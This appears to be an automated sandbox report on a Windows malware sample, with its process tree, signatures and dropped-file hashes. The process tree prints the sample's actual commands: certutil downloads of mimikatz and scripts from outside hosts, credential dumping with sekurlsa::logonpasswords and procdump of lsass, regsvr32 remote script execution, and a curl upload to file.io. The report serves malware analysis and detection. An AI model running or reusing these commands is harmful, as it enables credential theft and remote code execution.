Analysis

  • max time kernel
    42s
  • max time network
    103s
  • platform
    windows7_x64
  • resource
    win7-20220414-en
  • submitted
    23-04-2022 07:25

General

  • Target

    exec_ap.exe

  • Size

    3.9MB

  • MD5

    37130df0dc6057afaf677c2907eebdb4

  • SHA1

    75caff36d1115049d605f91a651bf0f8479118cc

  • SHA256

    08c11a4d6f275b0a5b57871c8d02097ec77019215ef66fb4e73dc7c29cf6833c

  • SHA512

    357185b2e36508485329a13792a9741ea5040db09b482e6ce10a67581f982883df79b0367a53bb8fcc2574fcdf2dddb97ced0303dfd72a1ee670182bf8001274

Score
10/10

Malware Config

Signatures

  • Mimikatz

    mimikatz is an open source tool to dump credentials on Windows.

  • TA505

    Cybercrime group active since 2015, responsible for families like Dridex and Locky.

  • mimikatz is an open source tool to dump credentials on Windows 5 IoCs
  • Downloads MZ/PE file
  • Executes dropped EXE 5 IoCs
  • Loads dropped DLL 8 IoCs
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs
  • Drops file in Windows directory 3 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Suspicious behavior: CmdExeWriteProcessMemorySpam 2 IoCs
  • Suspicious behavior: EnumeratesProcesses 16 IoCs
  • Suspicious use of AdjustPrivilegeToken 4 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\exec_ap.exe
    "C:\Users\Admin\AppData\Local\Temp\exec_ap.exe"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:644
    • C:\Windows\system32\cmd.exe
      cmd /c "certutil -urlcache -split -f https://raw.githubusercontent.com/inwestallis/first_repository/master/mim.b mim.b"
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:1416
      • C:\Windows\system32\certutil.exe
        certutil -urlcache -split -f https://raw.githubusercontent.com/inwestallis/first_repository/master/mim.b mim.b
        3⤵
          PID:1356
      • C:\Windows\system32\cmd.exe
        cmd /c "certutil -decode mim.b mim"
        2⤵
        • Suspicious use of WriteProcessMemory
        PID:1632
        • C:\Windows\system32\certutil.exe
          certutil -decode mim.b mim
          3⤵
            PID:1176
        • C:\Windows\system32\cmd.exe
          cmd /c "expand mim mimi.exe"
          2⤵
          • Suspicious use of WriteProcessMemory
          PID:1364
          • C:\Windows\system32\expand.exe
            expand mim mimi.exe
            3⤵
            • Drops file in Windows directory
            PID:1600
        • C:\Windows\system32\cmd.exe
          cmd /c "start mimi.exe" log privilege::debug sekurlsa::logonpasswords
          2⤵
          • Loads dropped DLL
          • Suspicious use of WriteProcessMemory
          PID:2012
          • C:\Users\Admin\AppData\Local\Temp\mimi.exe
            mimi.exe log privilege::debug sekurlsa::logonpasswords
            3⤵
            • Executes dropped EXE
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:1928
        • C:\Windows\system32\cmd.exe
          cmd /c "certutil -urlcache -split -f http://live.sysinternals.com/procdump.exe procdump.exe"
          2⤵
          • Suspicious use of WriteProcessMemory
          PID:1060
          • C:\Windows\system32\certutil.exe
            certutil -urlcache -split -f http://live.sysinternals.com/procdump.exe procdump.exe
            3⤵
              PID:1464
          • C:\Windows\system32\cmd.exe
            cmd /c "start procdump.exe -accepteula -ma lsass.exe lsass.dmp"
            2⤵
            • Suspicious use of WriteProcessMemory
            PID:1920
            • C:\Users\Admin\AppData\Local\Temp\procdump.exe
              procdump.exe -accepteula -ma lsass.exe lsass.dmp
              3⤵
              • Executes dropped EXE
              • Loads dropped DLL
              • Suspicious behavior: CmdExeWriteProcessMemorySpam
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of AdjustPrivilegeToken
              • Suspicious use of WriteProcessMemory
              PID:1216
              • C:\Users\Admin\AppData\Local\Temp\procdump64.exe
                procdump.exe -accepteula -ma lsass.exe lsass.dmp
                4⤵
                • Executes dropped EXE
                • Suspicious behavior: EnumeratesProcesses
                • Suspicious use of AdjustPrivilegeToken
                PID:300
          • C:\Windows\system32\cmd.exe
            cmd /c "certutil -urlcache -split -f https://github.com/inwestallis/first_repository/raw/master/gg.lnk gg.lnk"
            2⤵
            • Suspicious use of WriteProcessMemory
            PID:1816
            • C:\Windows\system32\certutil.exe
              certutil -urlcache -split -f https://github.com/inwestallis/first_repository/raw/master/gg.lnk gg.lnk
              3⤵
                PID:2008
            • C:\Windows\system32\cmd.exe
              cmd /c "start gg.lnk"
              2⤵
              • Suspicious use of WriteProcessMemory
              PID:1900
              • C:\Windows\System32\cmd.exe
                "C:\Windows\System32\cmd.exe" /c start "" certutil -urlcache -split -f https://cutt.ly/oPSSHWs C:\Users\Admin\AppData\Local\Temp/nc.bat & certutil -urlcache -split -f https://bit.ly/2HRvNjd C:\Users\Admin\AppData\Local\Temp/hidden.vbs & regsvr32.exe /s /u /i:https://bit.ly/3997g4Q scrobj.dll
                3⤵
                • Suspicious use of WriteProcessMemory
                PID:1676
                • C:\Windows\system32\certutil.exe
                  certutil -urlcache -split -f https://cutt.ly/oPSSHWs C:\Users\Admin\AppData\Local\Temp/nc.bat
                  4⤵
                    PID:812
                  • C:\Windows\system32\certutil.exe
                    certutil -urlcache -split -f https://bit.ly/2HRvNjd C:\Users\Admin\AppData\Local\Temp/hidden.vbs
                    4⤵
                      PID:1544
                    • C:\Windows\system32\regsvr32.exe
                      regsvr32.exe /s /u /i:https://bit.ly/3997g4Q scrobj.dll
                      4⤵
                      • Suspicious behavior: CmdExeWriteProcessMemorySpam
                      PID:1460
                      • C:\Windows\System32\WScript.exe
                        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\hidden.vbs" C:\Users\Admin\AppData\Local\Temp\nc.bat"
                        5⤵
                          PID:880
                          • C:\Windows\System32\cmd.exe
                            cmd /c ""C:\Users\Admin\AppData\Local\Temp\nc.bat" "
                            6⤵
                            • Loads dropped DLL
                            PID:1680
                            • C:\Users\Admin\AppData\Local\Temp\cr.tmp
                              C:\Users\Admin\AppData\Local\Temp\cr.tmp -urlcache -split -f https://github.com/inwestallis/first_repository/raw/master/curl.exe C:\Users\Admin\AppData\Local\Temp\curl.exe
                              7⤵
                              • Executes dropped EXE
                              PID:1364
                            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              powershell.exe C:\Users\Admin\AppData\Local\Temp\curl.exe -k -F 'file=@C:\Windows\notepad.exe' https://file.io
                              7⤵
                              • Loads dropped DLL
                              • Drops file in Windows directory
                              • Suspicious behavior: EnumeratesProcesses
                              • Suspicious use of AdjustPrivilegeToken
                              PID:1780
                              • C:\Users\Admin\AppData\Local\Temp\curl.exe
                                "C:\Users\Admin\AppData\Local\Temp\curl.exe" -k -F file=@C:\Windows\notepad.exe https://file.io
                                8⤵
                                • Executes dropped EXE
                                PID:1884

                Network

                MITRE ATT&CK Enterprise v6

                Replay Monitor

                Loading Replay Monitor...

                Downloads

                • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\4D1ED785E3365DE6C966A82E99CCE8EA_216A6C169356295AB09C26D4D7D32E06

                  Filesize

                  471B

                  MD5

                  2c4be8703de3399c2b18466b2ff245b1

                  SHA1

                  cb14643a77b656d699de935cc6e19070ed7c4b1e

                  SHA256

                  49640b7bfae17a6a774bf9fb1bbb7261ec379bba9d671b65fed31deacbc9900e

                  SHA512

                  2f22e812f22d137cc90f29a73ea494e5c3c3e192738df703c430746f264f68e187a7fed57f0391bac2ca432ba91e5571b1de7e9d17285dbf61bd3880bb2191db

                • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\50CD3D75D026C82E2E718570BD6F44D0_60E83F2095C16CA099C94596E7B8AA5D

                  Filesize

                  313B

                  MD5

                  c7cefb81cfaecf2c7759983ec20f4032

                  SHA1

                  468199e88236145aff06178a030f99356920203c

                  SHA256

                  04468dcc66540299e47ea205a4a2f14f44cf796f9e12833a7d3575da71d91c32

                  SHA512

                  9477d1d387c9f1e0453c44874648458177857efbf5a58f2ecb936ad73a12af2c25eddefe09da7a480b92e9c3d861262c23a8754e6232fc335e90fe20fe6d48fc

                • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\B398B80134F72209547439DB21AB308D_A4CF52CCA82D7458083F7280801A3A04

                  Filesize

                  471B

                  MD5

                  d3dcfce2d1ca2ab37fc53d8fa9867453

                  SHA1

                  9721e63fe2688d111479fef707be6c424cd57784

                  SHA256

                  9aa5c688501124a491b36bd4e1946e5e0bfc4a852848d60b67b95f9b4fcb034a

                  SHA512

                  ddc6667fb8b971b93c371a540b579ba80ae7867d38e636a252f2e914a40437636a3e8d9b473b07e39cc0c090c4370bb2ce56390e5971964bcfc7487c69c6ae74

                • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\B398B80134F72209547439DB21AB308D_ADE4E4D3A3BCBCA5C39C54D362D88565

                  Filesize

                  471B

                  MD5

                  689c0293466a0ab80bd0f590d57245a1

                  SHA1

                  0748d0449dc9ed35459e67fe7db02ec3308e49cb

                  SHA256

                  6bf53f4ea22e19700870eb6201964860705310251b24ae9e3b44efb95f0f9938

                  SHA512

                  bb124be939460309fcc4d43fa5f0f58b0f32be24edafd595c33721adaee82cea41a20db743e49b8de4f0897d7af0e6c3a3062e82df60a2980dd685c40a982f17

                • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\EDC238BFF48A31D55A97E1E93892934B_C31B2498754E340573F1336DE607D619

                  Filesize

                  471B

                  MD5

                  a5e64c0b78b86a768383649b1dfc80ad

                  SHA1

                  8a50936b15c93b32cae72ec022f6d6c12d4a9e27

                  SHA256

                  9409157ac1b5eb271401f036bba560cc40be77dad1cb62988bfab621ea679138

                  SHA512

                  16cac6c2ff6a4a2b2852a140d5455554d7183eac7f09f8db701b9f151d9b32f04cd95b0e255c88eafd4a550371131f88236028eea10d618e5537d8ce88a02d3a

                • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\4D1ED785E3365DE6C966A82E99CCE8EA_216A6C169356295AB09C26D4D7D32E06

                  Filesize

                  426B

                  MD5

                  aca398011f2a3a2695758cc757667b47

                  SHA1

                  36f2aa7a7089728d77bc052f51b7ae50e574d807

                  SHA256

                  6bf779a897e72ea188779718d26b25ad382043752f67da22bdcb0ab9b8b9da18

                  SHA512

                  a6123fec7a27e5c010ac877cec76c81c666ec93c722b45e48e6abb5de40a01ec07c38d7a2d9342694e7e6b079e7d0b34c72ca5f2a2d4ceef36923b5de14015e8

                • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\50CD3D75D026C82E2E718570BD6F44D0_60E83F2095C16CA099C94596E7B8AA5D

                  Filesize

                  434B

                  MD5

                  ae1d65dc1a279cc4ec6ad513d5c25834

                  SHA1

                  f8887caf5787a24999ab83dab667697fbb9caa80

                  SHA256

                  8dccc68ab35ed98d54bb12dd37169abb56abffa9a03c989efcdbec6ef36275ed

                  SHA512

                  fdf7ca14e41f71410eae232645744fc0847e0f49f1c035efad1f325a5b055c73809a59a373a65d38b0f4058fdb31b467725e782acfde99e21422a794b23db4bd

                • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

                  Filesize

                  344B

                  MD5

                  031ac3080d8e2707e55e3b9a6dc9bdad

                  SHA1

                  f837800169f3783b9f192b27f56f9d50b9f8c461

                  SHA256

                  5aaeabdd505b5019a83f44b0bc51c1e08de4edb28197b2aa38e99b81901699d3

                  SHA512

                  6336f80efeaadb68734e8852c3d26635d7b8a1a67c904ec6b6ce8ed373f0f5c972260dd779739f85e59f6c37d1a84400d3e171897ec58b4b0d7f22df3be3b022

                • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

                  Filesize

                  344B

                  MD5

                  7cff19d4728a27343157f447b1b3cd85

                  SHA1

                  24884f13eecee0c210f8eddc7e29f0062624b95a

                  SHA256

                  ee3c860e155617d5171b5a336efd4cc2fd91e122d68ddc1a6295eaeb8376e052

                  SHA512

                  ff8da78c6e536c99bd4fb48911a67e77235188798793a7fe0fcb8c30bc6f8b29dcb0a89469432b49463b38fe9bb6eaa8a59af211cb9fd96a3a57902519c59bf9

                • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

                  Filesize

                  344B

                  MD5

                  a85d52471ad3fe4f1a50cab2c47c0e49

                  SHA1

                  5b724850cb3e947a1c44496430e94b477edf2d4f

                  SHA256

                  13040a3db714e49abf28dc807e45966d6396a8d601225f76c63cccf43135db41

                  SHA512

                  b20236e814b84c937189244265fe25564014a1a137cbe8a777a660c3c07dfaf73704de74c4fa3e0c94ee6f3bda38ff74d220bd7ec21fdb0c9748d5b2367a3b82

                • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

                  Filesize

                  344B

                  MD5

                  42fae70557866b28cc1cd15b0e52a684

                  SHA1

                  cff5318c2238c2f38c667cc336ac3249f63d21b4

                  SHA256

                  8bd168788820db1987e9e8a23bab5f94071b6517bf503b36df34c453361d2a97

                  SHA512

                  b9bbd7d6bfc616cc6cd7bf37b800196869f3f106921f40e19239de946c29b7ca877f956ba3ff68ad1e4b642eaec460d9928ecb9a4db95fe2169dbe549a1c75f1

                • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\B398B80134F72209547439DB21AB308D_A4CF52CCA82D7458083F7280801A3A04

                  Filesize

                  430B

                  MD5

                  28153fe3c4c4327a73d0aa64c99eebc5

                  SHA1

                  138da9fab349581d36004b18987b048b47173667

                  SHA256

                  913bb2e3e58b9cba1edef3dde9228d31c66b64e672df9405403b78fb187be765

                  SHA512

                  827cf70e7e17853964f7614a5567d3e86f65a3c7c28ff6b002ddb0974213286fd764a097a550c8185b031d247c3705b41eec84c26ab4cfafc30de8ec4f7e323b

                • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\B398B80134F72209547439DB21AB308D_ADE4E4D3A3BCBCA5C39C54D362D88565

                  Filesize

                  434B

                  MD5

                  16db04f3271a6bc993716e4307b0fa1d

                  SHA1

                  73671f86bbdea87ca73c0e7f9bfd7a384b5aabc0

                  SHA256

                  a1c074560f68a8bdf51a594980ff1126b7c052345d2c1dd37cfe2a3f837c095b

                  SHA512

                  7769c281412f1529e341b02dcf2f5b731c512832130aa80e9088e04d1eb87abf7e9f2e47e873f2279de50e8897c92b8b4590c40db672591c9d95f6c56cfe8abd

                • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\EDC238BFF48A31D55A97E1E93892934B_C31B2498754E340573F1336DE607D619

                  Filesize

                  430B

                  MD5

                  4c99c0cb0efe92aa0a1dd1ca5308bca6

                  SHA1

                  0617b23afbb6c36dc5abe7b80ade423ed35734ac

                  SHA256

                  738f025be119a438e7c0643a63b0f1bdfa3d6118c6c5e86b20905d306c94b6ee

                  SHA512

                  24967bb013595104a65c98cbbd65cc28ea200aa9535065c765de143ece0109b5f1f4f49c4b42081874ed49be294eeaa7b3529f7db2b16abb76552578f6910c94

                • C:\Users\Admin\AppData\Local\Temp\cr.tmp

                  Filesize

                  1.1MB

                  MD5

                  ec1fd3050dbc40ec7e87ab99c7ca0b03

                  SHA1

                  ae7fdfc29f4ef31e38ebf381e61b503038b5cb35

                  SHA256

                  1e19c5a26215b62de1babd5633853344420c1e673bb83e8a89213085e17e16e3

                  SHA512

                  4e47331f2fdce77b01d86cf8e21cd7d6df13536f09b70c53e5a6b82f66512faa10e38645884c696b47a27ea6bddc6c1fdb905ee78684dca98cbda5f39fbafcc2

                • C:\Users\Admin\AppData\Local\Temp\curl.exe

                  Filesize

                  5.2MB

                  MD5

                  104023cef829fce3e34bf1514daff629

                  SHA1

                  b6e7b949109298ec7ff1aa64404a859b5b41ccae

                  SHA256

                  15b1158d806de14013fdc3f0e81dca725481d2393249994a122c0a70721ae9f5

                  SHA512

                  efebee49ffebf0dcb07c6e7d24477101a7c8a2a03b0bea4df9c1054943823026ffd46f54cc51fb8de062e3641f021d5cf0b23ed67d46a549ee23e5fa7b12be1e

                • C:\Users\Admin\AppData\Local\Temp\curl.exe

                  Filesize

                  5.2MB

                  MD5

                  104023cef829fce3e34bf1514daff629

                  SHA1

                  b6e7b949109298ec7ff1aa64404a859b5b41ccae

                  SHA256

                  15b1158d806de14013fdc3f0e81dca725481d2393249994a122c0a70721ae9f5

                  SHA512

                  efebee49ffebf0dcb07c6e7d24477101a7c8a2a03b0bea4df9c1054943823026ffd46f54cc51fb8de062e3641f021d5cf0b23ed67d46a549ee23e5fa7b12be1e

                • C:\Users\Admin\AppData\Local\Temp\gg.lnk

                  Filesize

                  2KB

                  MD5

                  e72dac079247ec5ee9aa0f04e02b5eb8

                  SHA1

                  fc8f701c6e9622bd133348973ae45d35220d5472

                  SHA256

                  c6c2d70b69746d12c5a0d1dafa8f8f180624135467e4fd3dbf8df7814754b581

                  SHA512

                  b4ac8a04ae1ba0878abe12d2d0b88ee10b4c465666f674dc8c05fc749fb7f79eb4ac7e4f481d84f879760498e0a5bddadb52eb8ffb04ed143bc08f868f8753b9

                • C:\Users\Admin\AppData\Local\Temp\hidden.vbs

                  Filesize

                  80B

                  MD5

                  fb9da4775539a0df96be320911f60634

                  SHA1

                  e97a8fdde3d17a652285f344cd3ec130e6587aee

                  SHA256

                  7d36dfbec1358c0c1ef56845dd774cea326d77a50bfe2873d3e6321dd6434352

                  SHA512

                  746bcb2078ac5ebbac5d3c0bd743c5bc8390aa540b0d51c1004a4887af289e66a436b8ec327c5bad64e3097e3bb9fc5a7fd62b2de768d437467ada069e4497e1

                • C:\Users\Admin\AppData\Local\Temp\mim

                  Filesize

                  577KB

                  MD5

                  d048add90a4b266a634b7d94d6c1147d

                  SHA1

                  0dc61af9e520de5f8d82ffe8b3b41411779ba67a

                  SHA256

                  39328905e637897edc09db7c13539403022c9d920c4f98d5580a84fcac61a640

                  SHA512

                  2f35ea3082e58d7d9170b5b7a06ce30e4380ae27a6a61acaf01221c4ae2a0bdab1189790235af3e97047314430fa369f677d5edfc3df6d12b3047d8b68efd0e0

                • C:\Users\Admin\AppData\Local\Temp\mim.b

                  Filesize

                  794KB

                  MD5

                  712ef1092e630cec4e8b7fcdbe9441f7

                  SHA1

                  252c9a68ab7f5d760128767973f3b0ac61955fce

                  SHA256

                  dd155b80f1296d1e66de0d19044f55e6cd148eaaf0f06c616a451edaad58c754

                  SHA512

                  20d024c750219b830e5856f67eaf43036aa44f3c9ebb5d6d833a2c11100bbb650e6b3be9b8c344d9f8705819facde8afdb3b151ef9189df95b857e268eeb45e9

                • C:\Users\Admin\AppData\Local\Temp\mimi.exe

                  Filesize

                  1.2MB

                  MD5

                  465d5d850f54d9cde767bda90743df30

                  SHA1

                  c9fb7f8a4c6b7b12b493a99a8dc6901d17867388

                  SHA256

                  cb1553a3c88817e4cc774a5a93f9158f6785bd3815447d04b6c3f4c2c4b21ed7

                  SHA512

                  c2ec02f8ead693db3f09defa24431c12be9748412af52183bfa6cbda2f698780b6dd1b22721aa77a1aa00a60f624a56eecfa485c45bd5ecfbdf13b2bae35b8c9

                • C:\Users\Admin\AppData\Local\Temp\mimi.exe

                  Filesize

                  1.2MB

                  MD5

                  465d5d850f54d9cde767bda90743df30

                  SHA1

                  c9fb7f8a4c6b7b12b493a99a8dc6901d17867388

                  SHA256

                  cb1553a3c88817e4cc774a5a93f9158f6785bd3815447d04b6c3f4c2c4b21ed7

                  SHA512

                  c2ec02f8ead693db3f09defa24431c12be9748412af52183bfa6cbda2f698780b6dd1b22721aa77a1aa00a60f624a56eecfa485c45bd5ecfbdf13b2bae35b8c9

                • C:\Users\Admin\AppData\Local\Temp\nc.bat

                  Filesize

                  868B

                  MD5

                  6113873b074c6eedaa6e7881ee766990

                  SHA1

                  d7731b3276a2a213758b441c2e48a8123001c73f

                  SHA256

                  d537cc0e2818a5bd240973438d0cdfd777519aa06da41a228dc378b233aaddee

                  SHA512

                  f7dbdc7a70b7459dbf7d084d728cf83bfeb02330fc7b09ad95594dcbadc4e38349cf7222bdef7daccc6c8a3f7f8444b74cc62f8db4dcab41a4785fdc9ee62c3c

                • C:\Users\Admin\AppData\Local\Temp\procdump.exe

                  Filesize

                  735KB

                  MD5

                  170637b901dc67cda3d905a714096a7f

                  SHA1

                  f4d82f11ca773a5606a2bc07add94a0cc76827ec

                  SHA256

                  8ae63ddace21276fa6cb4b2613468e5730fc550a1374543372972e52dc232ec6

                  SHA512

                  4800036de7ea669da2c8979da08642b67205bd5d9b57ca346e66d77a2098d772cd9d324165e5256981a822df3b7a721230689132466506ddeaf0011f8186b7d9

                • C:\Users\Admin\AppData\Local\Temp\procdump.exe

                  Filesize

                  735KB

                  MD5

                  170637b901dc67cda3d905a714096a7f

                  SHA1

                  f4d82f11ca773a5606a2bc07add94a0cc76827ec

                  SHA256

                  8ae63ddace21276fa6cb4b2613468e5730fc550a1374543372972e52dc232ec6

                  SHA512

                  4800036de7ea669da2c8979da08642b67205bd5d9b57ca346e66d77a2098d772cd9d324165e5256981a822df3b7a721230689132466506ddeaf0011f8186b7d9

                • C:\Users\Admin\AppData\Local\Temp\procdump64.exe

                  Filesize

                  391KB

                  MD5

                  8cc9c90598900cecb00192da74163250

                  SHA1

                  8f7e488ce09cc8e1db28e1a2a075ea59104b1978

                  SHA256

                  1a107c3ece1880cbbdc0a6c0817624b0dd033b02ebaf7fa366306aaca22c103d

                  SHA512

                  09335b24e078f3a27229447d299d573d944e3f64df4bdead5c3406926c607d283c025b095b5499a404b9614000b041f074ff603d58e4b4e3222d6f01a03e0689

                • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Cookies\JRZB2GZB.txt

                  Filesize

                  88B

                  MD5

                  43b1ec210827465c188d768f77d20ed6

                  SHA1

                  6e33d80e6748c74f742e1ec8ade3a125199f97fc

                  SHA256

                  41003aef7de831a72a0cd1bcc13d39008e3dc2203b3d8db576d08ddb1811e6d5

                  SHA512

                  8f8f3bcbba6f74a146c73441983165f0ddf877d37cfcaf46a8fa9846f5bb7b05e8e57a5d7c7d45275071401294d3b0a12d37148de038d812a0070796d0371b82

                • \Users\Admin\AppData\Local\Temp\cr.tmp

                  Filesize

                  1.1MB

                  MD5

                  ec1fd3050dbc40ec7e87ab99c7ca0b03

                  SHA1

                  ae7fdfc29f4ef31e38ebf381e61b503038b5cb35

                  SHA256

                  1e19c5a26215b62de1babd5633853344420c1e673bb83e8a89213085e17e16e3

                  SHA512

                  4e47331f2fdce77b01d86cf8e21cd7d6df13536f09b70c53e5a6b82f66512faa10e38645884c696b47a27ea6bddc6c1fdb905ee78684dca98cbda5f39fbafcc2

                • \Users\Admin\AppData\Local\Temp\curl.exe

                  Filesize

                  5.2MB

                  MD5

                  104023cef829fce3e34bf1514daff629

                  SHA1

                  b6e7b949109298ec7ff1aa64404a859b5b41ccae

                  SHA256

                  15b1158d806de14013fdc3f0e81dca725481d2393249994a122c0a70721ae9f5

                  SHA512

                  efebee49ffebf0dcb07c6e7d24477101a7c8a2a03b0bea4df9c1054943823026ffd46f54cc51fb8de062e3641f021d5cf0b23ed67d46a549ee23e5fa7b12be1e

                • \Users\Admin\AppData\Local\Temp\curl.exe

                  Filesize

                  5.2MB

                  MD5

                  104023cef829fce3e34bf1514daff629

                  SHA1

                  b6e7b949109298ec7ff1aa64404a859b5b41ccae

                  SHA256

                  15b1158d806de14013fdc3f0e81dca725481d2393249994a122c0a70721ae9f5

                  SHA512

                  efebee49ffebf0dcb07c6e7d24477101a7c8a2a03b0bea4df9c1054943823026ffd46f54cc51fb8de062e3641f021d5cf0b23ed67d46a549ee23e5fa7b12be1e

                • \Users\Admin\AppData\Local\Temp\curl.exe

                  Filesize

                  5.2MB

                  MD5

                  104023cef829fce3e34bf1514daff629

                  SHA1

                  b6e7b949109298ec7ff1aa64404a859b5b41ccae

                  SHA256

                  15b1158d806de14013fdc3f0e81dca725481d2393249994a122c0a70721ae9f5

                  SHA512

                  efebee49ffebf0dcb07c6e7d24477101a7c8a2a03b0bea4df9c1054943823026ffd46f54cc51fb8de062e3641f021d5cf0b23ed67d46a549ee23e5fa7b12be1e

                • \Users\Admin\AppData\Local\Temp\mimi.exe

                  Filesize

                  1.2MB

                  MD5

                  465d5d850f54d9cde767bda90743df30

                  SHA1

                  c9fb7f8a4c6b7b12b493a99a8dc6901d17867388

                  SHA256

                  cb1553a3c88817e4cc774a5a93f9158f6785bd3815447d04b6c3f4c2c4b21ed7

                  SHA512

                  c2ec02f8ead693db3f09defa24431c12be9748412af52183bfa6cbda2f698780b6dd1b22721aa77a1aa00a60f624a56eecfa485c45bd5ecfbdf13b2bae35b8c9

                • \Users\Admin\AppData\Local\Temp\mimi.exe

                  Filesize

                  1.2MB

                  MD5

                  465d5d850f54d9cde767bda90743df30

                  SHA1

                  c9fb7f8a4c6b7b12b493a99a8dc6901d17867388

                  SHA256

                  cb1553a3c88817e4cc774a5a93f9158f6785bd3815447d04b6c3f4c2c4b21ed7

                  SHA512

                  c2ec02f8ead693db3f09defa24431c12be9748412af52183bfa6cbda2f698780b6dd1b22721aa77a1aa00a60f624a56eecfa485c45bd5ecfbdf13b2bae35b8c9

                • \Users\Admin\AppData\Local\Temp\mimi.exe

                  Filesize

                  1.2MB

                  MD5

                  465d5d850f54d9cde767bda90743df30

                  SHA1

                  c9fb7f8a4c6b7b12b493a99a8dc6901d17867388

                  SHA256

                  cb1553a3c88817e4cc774a5a93f9158f6785bd3815447d04b6c3f4c2c4b21ed7

                  SHA512

                  c2ec02f8ead693db3f09defa24431c12be9748412af52183bfa6cbda2f698780b6dd1b22721aa77a1aa00a60f624a56eecfa485c45bd5ecfbdf13b2bae35b8c9

                • \Users\Admin\AppData\Local\Temp\procdump64.exe

                  Filesize

                  391KB

                  MD5

                  8cc9c90598900cecb00192da74163250

                  SHA1

                  8f7e488ce09cc8e1db28e1a2a075ea59104b1978

                  SHA256

                  1a107c3ece1880cbbdc0a6c0817624b0dd033b02ebaf7fa366306aaca22c103d

                  SHA512

                  09335b24e078f3a27229447d299d573d944e3f64df4bdead5c3406926c607d283c025b095b5499a404b9614000b041f074ff603d58e4b4e3222d6f01a03e0689

                • memory/1176-59-0x00000000FF131000-0x00000000FF133000-memory.dmp

                  Filesize

                  8KB

                • memory/1216-79-0x0000000075BF1000-0x0000000075BF3000-memory.dmp

                  Filesize

                  8KB

                • memory/1356-56-0x00000000FFCA1000-0x00000000FFCA3000-memory.dmp

                  Filesize

                  8KB

                • memory/1364-148-0x00000000FF361000-0x00000000FF363000-memory.dmp

                  Filesize

                  8KB

                • memory/1464-74-0x000007FEFC521000-0x000007FEFC523000-memory.dmp

                  Filesize

                  8KB

                • memory/1464-73-0x00000000FFDE1000-0x00000000FFDE3000-memory.dmp

                  Filesize

                  8KB

                • memory/1544-128-0x00000000FF371000-0x00000000FF373000-memory.dmp

                  Filesize

                  8KB

                • memory/1780-164-0x0000000002862000-0x0000000002864000-memory.dmp

                  Filesize

                  8KB

                • memory/1780-155-0x000007FEF4050000-0x000007FEF4BAD000-memory.dmp

                  Filesize

                  11.4MB

                • memory/1780-156-0x000000001B730000-0x000000001BA2F000-memory.dmp

                  Filesize

                  3.0MB

                • memory/1780-165-0x0000000002864000-0x0000000002867000-memory.dmp

                  Filesize

                  12KB

                • memory/1780-166-0x000000000286B000-0x000000000288A000-memory.dmp

                  Filesize

                  124KB

                • memory/1780-163-0x0000000002860000-0x0000000002862000-memory.dmp

                  Filesize

                  8KB

                • memory/2008-85-0x00000000FF9B1000-0x00000000FF9B3000-memory.dmp

                  Filesize

                  8KB